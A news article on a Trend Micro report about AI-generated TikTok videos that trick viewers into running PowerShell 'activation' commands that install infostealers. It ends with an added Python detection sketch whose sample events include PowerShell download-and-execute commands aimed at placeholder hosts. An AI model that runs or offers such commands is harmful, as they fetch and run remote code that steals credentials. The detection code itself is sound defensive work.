- Trend Micro spotted a new malware campaign on TikTok
- Videos show how to activate "premium" features in different software
- The clips were generated by AI and tricked victims into downloading infostealers
Hackers are publishing AI-generated videos on TikTok to trick users into downloading infostealing malware, cybersecurity researchers at Trend Micro have warned.
The premise is simple: the attackers use AI to generate numerous videos that demonstrate how to easily "activate" Windows and Microsoft Office, or enable "premium features" in applications such as Spotify or CapCut.
They then share these videos on TikTok, whose algorithm makes it more likely that a video will go viral, which in turn makes the attack more likely to succeed.
A new twist on old tricks
In the clip, a person is shown bringing up the Run program in Windows and then running a PowerShell command.
In the video, the command appears to activate special features. In reality, users who execute it download a malicious script that, in turn, deploys the Vidar and StealC infostealers.
These infostealers can take screenshots, steal login credentials, grab credit card data, and exfiltrate cookies, cryptocurrency wallet information, 2FA codes and more.
“This attack uses videos (possibly generated by AI) to instruct users to execute PowerShell commands, which are disguised as software activation steps. The algorithmic scope of TikTok increases the probability of a generalized exhibition, with a video that reaches more than half a million views,” Trend Micro said.
“The videos are very similar, with only minor differences in the angles of the camera and the download URL used by PowerShell to obtain the payload,” the researchers added.
“These suggest that videos were probably created through automation. The instructional voice also seems generated by AI, reinforcing the probability that the tools of AI are used to produce these videos.”
One of the videos has approximately 500,000 views, more than 20,000 likes and more than 100 comments, which makes it quite successful.
Videos have been used to deliver malware in the past, but this new campaign is a significant departure from previous methods.
The difference is that before, the link to the malware was shared in the video's description or in a comment, where it could still be picked up by security solutions. By delivering the bait inside the video itself, the attackers successfully avoid almost all security measures.
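Because the lure sits inside the video, the executed command is the first artifact defenders can inspect, and it appears on the endpoint. As an added example (not from Trend Micro or the original article), the sketch below flags PowerShell started from explorer.exe, the parent process for Run-dialog launches, when its command line both fetches and executes a remote script. The event fields, hosts and example.invalid URLs are constructed.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed process-creation events (fields modelled on Sysmon Event ID 1).
EVENTS = [
    {"host": "ws-01", "parent": EXPLORER, "image": PS,
     "cmdline": 'powershell -Command "iex (irm https://example.invalid/activate)"'},
    {"host": "ws-02", "parent": EXPLORER, "image": PS,
     "cmdline": "powershell.exe"},  # user just opened a shell
    {"host": "ws-03", "parent": r"C:\Program Files\Agent\agent.exe", "image": PS,
     "cmdline": r"powershell -File C:\scripts\inventory.ps1"},  # hypothetical agent
    {"host": "ws-04", "parent": EXPLORER,
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "cmdline": 'pwsh -c "irm http://example.invalid/premium | IEX"'},
    {"host": "ws-05", "parent": EXPLORER, "image": PS,
     "cmdline": "powershell iwr https://example.invalid/setup.msi -OutFile setup.msi"},
]

SHELLS = {"powershell.exe", "pwsh.exe"}
# Cmdlets, aliases and methods that retrieve remote content.
FETCH = re.compile(
    r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|curl|wget)\b", re.I)
# Cmdlet and alias that run a string as code.
EXEC = re.compile(r"\b(iex|invoke-expression)\b", re.I)
URL = re.compile(r"https?://[^\s'\")|]+", re.I)


def flag_run_dialog_cradles(events):
    """Return (host, url) pairs for download-and-execute PowerShell
    launched with explorer.exe as parent."""
    hits = []
    for ev in events:
        if basename(ev["image"]).lower() not in SHELLS:
            continue
        # Heuristic: explorer.exe is also the parent for Start-menu and
        # shortcut launches, so treat a hit as a lead, not a verdict.
        if basename(ev["parent"]).lower() != "explorer.exe":
            continue
        cmd = ev["cmdline"]
        url = URL.search(cmd)
        # Require fetch AND execute: a plain file download (ws-05) is not flagged.
        if url and FETCH.search(cmd) and EXEC.search(cmd):
            hits.append((ev["host"], url.group(0)))
    return hits


if __name__ == "__main__":
    for host, url in flag_run_dialog_cradles(EVENTS):
        print(f"{host}: PowerShell from explorer.exe fetched and ran {url}")
```
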
Via BleepingComputer